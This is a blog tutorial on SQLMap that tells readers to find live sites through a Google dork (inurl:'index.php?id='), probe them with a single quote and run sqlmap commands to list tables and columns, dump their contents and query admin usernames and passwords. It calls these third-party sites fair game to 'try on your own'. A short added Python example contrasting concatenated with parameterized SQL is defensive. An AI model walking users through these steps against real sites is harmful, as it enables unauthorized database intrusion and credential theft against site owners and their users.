©2020 by Shakyens.

  • Gautam Sharma

SQLMap - a powerful penetration testing tool

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

I enjoy searching for vulnerabilities in sites, which you can easily find with the help of Google indexing using this keyword -

inurl:"index.php?id="

This will list sites that may have vulnerabilities in their database; whether they actually do depends on how the database queries in the site's code are written. I suggest hardening the database and using proper code to avoid SQL injection attacks! The screenshot below shows the sites listed by Google when we use the above keyword.



Links are hidden for good reason; however, you can try it on your own :)

Now, to check these sites for vulnerabilities, open any link and in the URL, right after the digit, enter a simple SQL string delimiter - ' (single quotation mark) - then press Enter; you will see an SQL exception. Similarly, you can try another SQL keyword. I prefer using the SQLMap CLI, which is available in Kali Linux, or you can get it from this link using the terminal -

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

After a successful download, run the following command to move into your SQLMap directory -

cd sqlmap-dev

Now test a sample site using the following commands. Let's first retrieve the database details with this command -

python sqlmap.py -u 'http://samplesite.com/page.php?id=5'

Running this command will give you the database details: its version, the web technology used, etc. You can also see all the parameters being passed while performing the injection.



To retrieve the tables, add the --tables switch at the end of the above command -

python sqlmap.py -u 'http://samplesite.com/page.php?id=5' --tables

This will list all the tables in the database. In the same way, you can fetch all the columns of a selected table using the following command -

python sqlmap.py -u 'http://samplesite.com/page.php?id=5' -T sampleTable --columns

This will list the column names of the table "sampleTable". Now, if you want to dump that table's contents, use the following command -

python sqlmap.py -u 'http://samplesite.com/page.php?id=5' -T sampleTable --dump

This will list all the data present inside that table. You can try the same with all the other tables.. :)
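Everything above works only because page.php splices the id parameter straight into its SQL text, which is what the hardening advice earlier is about. The following is an added example, not code from the original post, in Python with an in-memory SQLite table as a constructed stand-in for the site's backend: the vulnerable string-concatenated lookup beside a parameterized one, each fed the plain id and the single-quote check, so you can see why one throws the SQL exception and the other treats the quote as harmless data.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the "page.php?id=" backend (assumption, not the real site).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [(5, "About us"), (6, "Contact")])
    return conn


def lookup_vulnerable(conn, raw_id):
    # String concatenation: the request parameter becomes part of the SQL text,
    # so a stray quote changes the statement itself and raises a database error.
    sql = "SELECT title FROM pages WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, raw_id):
    # Placeholder binding: the parameter is passed as data to the driver and is
    # never parsed as SQL, so "5'" simply matches no row.
    sql = "SELECT title FROM pages WHERE id=?"
    return [row[0] for row in conn.execute(sql, (raw_id,))]


def probe(lookup, raw_id):
    """Run one request the way a tester reads the page: ('ok', rows) or ('error', msg)."""
    conn = make_db()
    try:
        return ("ok", lookup(conn, raw_id))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    finally:
        conn.close()


if __name__ == "__main__":
    for raw_id in ("5", "5'"):
        print("vulnerable    id=%-3r -> %r" % (raw_id, probe(lookup_vulnerable, raw_id)))
        print("parameterized id=%-3r -> %r" % (raw_id, probe(lookup_parameterized, raw_id)))
```

The error branch of the vulnerable lookup is the "SQL exception" the single-quote check relies on; the parameterized lookup returns an empty result for the same input, which is why it gives sqlmap's detection engine nothing to work with.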

Issues while testing - 


If you get  [CRITICAL] connection timed while the site runs normally -


SQLMap is very granular in terms of dumping entries from a table. The relevant switches are:

--dump - Dump DBMS database table entries.

-D DB - DBMS database to enumerate.

-T TBL - DBMS database table to enumerate.

-C COL - DBMS database table column to enumerate.

--start=LIMITSTART - First query output entry to retrieve.


However, in some cases you might want to dump all entries matching a custom WHERE condition. For such cases, use one of the following switches:


--sql-query=QUERY - SQL statement to be executed.

--sql-shell - Prompt for an interactive SQL shell.

--sql-file=SQLFILE - Execute SQL statements from given file(s).


For example:

--sql-query "SELECT user, password FROM users WHERE privilege='admin'"

Note: Demo/content for educational purposes only.
